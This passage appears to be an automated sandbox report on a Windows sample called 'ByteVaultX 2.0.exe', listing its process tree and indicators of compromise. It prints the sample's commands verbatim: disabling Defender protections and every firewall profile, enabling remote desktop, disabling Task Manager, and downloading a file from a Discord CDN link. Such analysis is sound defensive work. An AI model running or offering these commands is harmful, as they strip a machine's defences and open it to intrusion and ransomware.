MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "423462179" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4616 powershell.exe 4616 powershell.exe 4616 powershell.exe 1232 powershell.exe 1232 powershell.exe 1232 powershell.exe 1232 powershell.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 1456 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 3344 powershell.exe 3344 powershell.exe 3344 powershell.exe 3344 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 2220 powershell.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 932 powershell.exe 932 powershell.exe 932 powershell.exe 932 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 416 powershell.exe 416 powershell.exe 416 powershell.exe 416 powershell.exe 4588 powershell.exe 4588 powershell.exe 4588 powershell.exe 4588 powershell.exe 4128 powershell.exe 4128 powershell.exe 4128 powershell.exe 4128 powershell.exe 3024 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 224 MicrosoftEdgeCP.exe 224 MicrosoftEdgeCP.exe 224 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4616 powershell.exe Token: SeIncreaseQuotaPrivilege 4616 powershell.exe Token: SeSecurityPrivilege 4616 powershell.exe Token: SeTakeOwnershipPrivilege 4616 powershell.exe Token: SeLoadDriverPrivilege 4616 powershell.exe Token: SeSystemProfilePrivilege 4616 powershell.exe Token: SeSystemtimePrivilege 4616 powershell.exe Token: SeProfSingleProcessPrivilege 4616 powershell.exe Token: SeIncBasePriorityPrivilege 4616 powershell.exe Token: SeCreatePagefilePrivilege 4616 powershell.exe Token: SeBackupPrivilege 4616 powershell.exe Token: SeRestorePrivilege 4616 powershell.exe Token: SeShutdownPrivilege 4616 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeSystemEnvironmentPrivilege 4616 powershell.exe Token: SeRemoteShutdownPrivilege 4616 powershell.exe Token: SeUndockPrivilege 4616 powershell.exe Token: SeManageVolumePrivilege 4616 powershell.exe Token: 33 4616 powershell.exe Token: 34 4616 powershell.exe Token: 35 4616 powershell.exe Token: 36 4616 powershell.exe Token: SeDebugPrivilege 1528 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1528 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1528 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1528 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 796 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 796 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 796 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1232 powershell.exe Token: SeIncreaseQuotaPrivilege 1232 powershell.exe Token: SeSecurityPrivilege 1232 powershell.exe Token: SeTakeOwnershipPrivilege 1232 powershell.exe Token: SeLoadDriverPrivilege 1232 powershell.exe Token: SeSystemProfilePrivilege 1232 powershell.exe Token: SeSystemtimePrivilege 1232 powershell.exe Token: SeProfSingleProcessPrivilege 1232 powershell.exe Token: SeIncBasePriorityPrivilege 1232 powershell.exe Token: SeCreatePagefilePrivilege 1232 powershell.exe Token: SeBackupPrivilege 1232 powershell.exe Token: SeRestorePrivilege 1232 powershell.exe Token: SeShutdownPrivilege 1232 powershell.exe Token: SeDebugPrivilege 1232 powershell.exe Token: SeSystemEnvironmentPrivilege 1232 powershell.exe Token: SeRemoteShutdownPrivilege 1232 powershell.exe Token: SeUndockPrivilege 1232 powershell.exe Token: SeManageVolumePrivilege 1232 powershell.exe Token: 33 1232 powershell.exe Token: 34 1232 powershell.exe Token: 35 1232 powershell.exe Token: 36 1232 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1456 powershell.exe Token: SeSecurityPrivilege 1456 powershell.exe Token: SeTakeOwnershipPrivilege 1456 powershell.exe Token: SeLoadDriverPrivilege 1456 powershell.exe Token: SeSystemProfilePrivilege 1456 powershell.exe Token: SeSystemtimePrivilege 1456 powershell.exe Token: SeProfSingleProcessPrivilege 1456 powershell.exe Token: SeIncBasePriorityPrivilege 1456 powershell.exe Token: SeCreatePagefilePrivilege 1456 powershell.exe Token: SeBackupPrivilege 1456 powershell.exe Token: SeRestorePrivilege 1456 powershell.exe Token: SeShutdownPrivilege 1456 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4636 MicrosoftEdge.exe 224 MicrosoftEdgeCP.exe 1528 MicrosoftEdgeCP.exe 224 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4972 wrote to memory of 2212 4972 ByteVaultX 2.0.exe 73 PID 4972 wrote to memory of 2212 4972 ByteVaultX 2.0.exe 73 PID 2212 wrote to memory of 4616 2212 ByteVaultX 2.0.exe 74 PID 2212 wrote to memory of 4616 2212 ByteVaultX 2.0.exe 74 PID 2212 wrote to memory of 2564 2212 ByteVaultX 2.0.exe 78 PID 2212 wrote to memory of 2564 2212 ByteVaultX 2.0.exe 78 PID 2212 wrote to memory of 1968 2212 ByteVaultX 2.0.exe 80 PID 2212 wrote to memory of 1968 2212 ByteVaultX 2.0.exe 80 PID 2212 wrote to memory of 4292 2212 ByteVaultX 2.0.exe 84 PID 2212 wrote to memory of 4292 2212 ByteVaultX 2.0.exe 84 PID 4292 wrote to memory of 2696 4292 cmd.exe 87 PID 4292 wrote to memory of 2696 4292 cmd.exe 87 PID 4292 wrote to memory of 1604 4292 cmd.exe 89 PID 4292 wrote to memory of 1604 4292 cmd.exe 89 PID 4292 wrote to memory of 1252 4292 cmd.exe 91 PID 4292 wrote to memory of 1252 4292 cmd.exe 91 PID 4292 wrote to memory of 1932 4292 cmd.exe 92 PID 4292 wrote to memory of 1932 4292 cmd.exe 92 PID 4292 wrote to memory of 1232 4292 cmd.exe 93 PID 4292 wrote to memory of 1232 4292 cmd.exe 93 PID 224 wrote to memory of 796 224 MicrosoftEdgeCP.exe 90 PID 224 wrote to memory of 796 224 MicrosoftEdgeCP.exe 90 PID 224 wrote to memory of 796 224 MicrosoftEdgeCP.exe 90 PID 224 wrote to memory of 796 224 MicrosoftEdgeCP.exe 90 PID 4292 wrote to memory of 1456 4292 cmd.exe 94 PID 4292 wrote to memory of 1456 4292 cmd.exe 94 PID 4292 wrote to memory of 4516 4292 cmd.exe 95 PID 4292 wrote to memory of 4516 4292 cmd.exe 95 PID 4292 wrote to memory of 3344 4292 cmd.exe 96 PID 4292 wrote to memory of 3344 4292 cmd.exe 96 PID 4292 wrote to memory of 4592 4292 cmd.exe 97 PID 4292 wrote to memory of 4592 4292 cmd.exe 97 PID 4292 wrote to memory of 3708 4292 cmd.exe 98 PID 4292 wrote to memory of 3708 4292 cmd.exe 98 PID 4292 wrote to memory of 2732 4292 cmd.exe 99 PID 4292 wrote to memory of 2732 4292 cmd.exe 99 PID 4292 wrote to memory of 4588 4292 cmd.exe 100 PID 4292 wrote to memory of 4588 4292 cmd.exe 100 PID 4292 wrote to memory of 5096 4292 cmd.exe 101 PID 4292 wrote to memory of 5096 4292 cmd.exe 101 PID 4292 wrote to memory of 4856 4292 cmd.exe 102 PID 4292 wrote to memory of 4856 4292 cmd.exe 102 PID 4292 wrote to memory of 668 4292 cmd.exe 118 PID 4292 wrote to memory of 668 4292 cmd.exe 118 PID 4292 wrote to memory of 4860 4292 cmd.exe 104 PID 4292 wrote to memory of 4860 4292 cmd.exe 104 PID 4292 wrote to memory of 3652 4292 cmd.exe 105 PID 4292 wrote to memory of 3652 4292 cmd.exe 105 PID 4292 wrote to memory of 2220 4292 cmd.exe 106 PID 4292 wrote to memory of 2220 4292 cmd.exe 106 PID 4292 wrote to memory of 4572 4292 cmd.exe 107 PID 4292 wrote to memory of 4572 4292 cmd.exe 107 PID 4292 wrote to memory of 1856 4292 cmd.exe 108 PID 4292 wrote to memory of 1856 4292 cmd.exe 108 PID 4292 wrote to memory of 932 4292 cmd.exe 109 PID 4292 wrote to memory of 932 4292 cmd.exe 109 PID 4292 wrote to memory of 2624 4292 cmd.exe 110 PID 4292 wrote to memory of 2624 4292 cmd.exe 110 PID 4292 wrote to memory of 4268 4292 cmd.exe 149 PID 4292 wrote to memory of 4268 4292 cmd.exe 149 PID 4292 wrote to memory of 416 4292 cmd.exe 127 PID 4292 wrote to memory of 416 4292 cmd.exe 127 PID 416 wrote to memory of 1932 416 powershell.exe 114 PID 416 wrote to memory of 1932 416 powershell.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2564
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:1968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:2696
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1252
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4592
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:3708
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵PID:4588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:4196
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:1380
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:5048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:4040
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:416
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
PID:4512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:4416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵PID:3944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Command and Scripting Interpreter: PowerShell
PID:4484 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:4492
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:3340
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:4268
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:3944
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
PID:1792
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵
- Modifies Windows Firewall
PID:4512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:3864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:1748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵PID:1572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵PID:2988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:208
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:2012
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:320
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:3384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵
- Modifies Windows Firewall
PID:4864
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:4656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:4980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:4784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:4208
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:4296
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:4592
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:4180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:3544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵PID:1252
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵PID:1456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:4432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:4236
-
-
